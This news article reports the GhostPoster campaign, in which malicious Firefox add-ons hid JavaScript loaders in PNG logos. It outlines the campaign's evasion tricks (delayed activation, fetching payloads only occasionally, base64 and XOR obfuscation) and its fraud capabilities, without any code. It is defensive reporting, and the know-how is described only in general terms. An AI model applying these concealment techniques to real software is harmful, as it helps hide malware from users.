A newly identified cyber campaign named GhostPoster has exposed a stealthy method of hiding malicious JavaScript code inside image logos of Firefox browser extensions.
Security researchers found that the attackers embedded JavaScript within PNG logo files of malicious Firefox add ons, some of which recorded more than 50,000 downloads. Once active, the code grants operators persistent high privilege access to the browser, allowing affiliate link hijacking, tracking injection, and large scale click and ad fraud.
The hidden script functions as a loader that pulls the main payload from a remote server. To avoid detection, the payload is fetched only once in every 10 attempts.
Researchers identified 17 compromised extensions that either read the PNG logo to extract and execute the loader or download the payload directly from attacker controlled infrastructure. While the payload loading methods vary, all extensions show the same behavior and communicate with the same backend systems.
The affected extensions fall under popular categories such as VPN services, translation tools, weather apps, screen capture utilities, and ad blockers. One extension, FreeVPN Forever, was flagged after analysis showed it parsing raw image bytes to locate a JavaScript snippet hidden using steganography.
The loader activates after 48 hours and contacts a hardcoded domain, with a backup domain available if the first attempt fails. It remains dormant most of the time, retrieving the payload only 10 percent of the time, helping it bypass traffic monitoring tools.
Once downloaded, the payload is heavily obfuscated using case swapping, base64 encoding, and XOR encryption tied to the extension runtime ID. The malware can hijack affiliate links, inject analytics tracking, strip security headers, bypass CAPTCHA protections, and deploy invisible iframes for fraud that self delete after 15 seconds.
While it does not steal passwords or redirect users to phishing pages, the campaign poses a serious privacy risk. Researchers warn the infrastructure could deliver more harmful payloads in the future.
Users are advised to remove the listed extensions and consider resetting passwords for critical accounts. The browser platform has confirmed that all identified extensions have been removed and detection systems have been updated.
“User safety is something we’ve always prioritized and taken very seriously. Our add-ons team has investigated this report and as a result, has taken action to remove all of these extensions from AMO. We have updated our automated systems to detect and block extensions using similar attacks now and in the future.”
Also read: Viksit Workforce for a Viksit Bharat
Do Follow: The Mainstream formerly known as CIO News LinkedIn Account | The Mainstream formerly known as CIO News Facebook | The Mainstream formerly known as CIO News Youtube | The Mainstream formerly known as CIO News Twitter
About us:
The Mainstream is a premier platform delivering the latest updates and informed perspectives across the technology business and cyber landscape. Built on research-driven, thought leadership and original intellectual property, The Mainstream also curates summits & conferences that convene decision makers to explore how technology reshapes industries and leadership. With a growing presence in India and globally across the Middle East, Africa, ASEAN, the USA, the UK and Australia, The Mainstream carries a vision to bring the latest happenings and insights to 8.2 billion people and to place technology at the centre of conversation for leaders navigating the future.
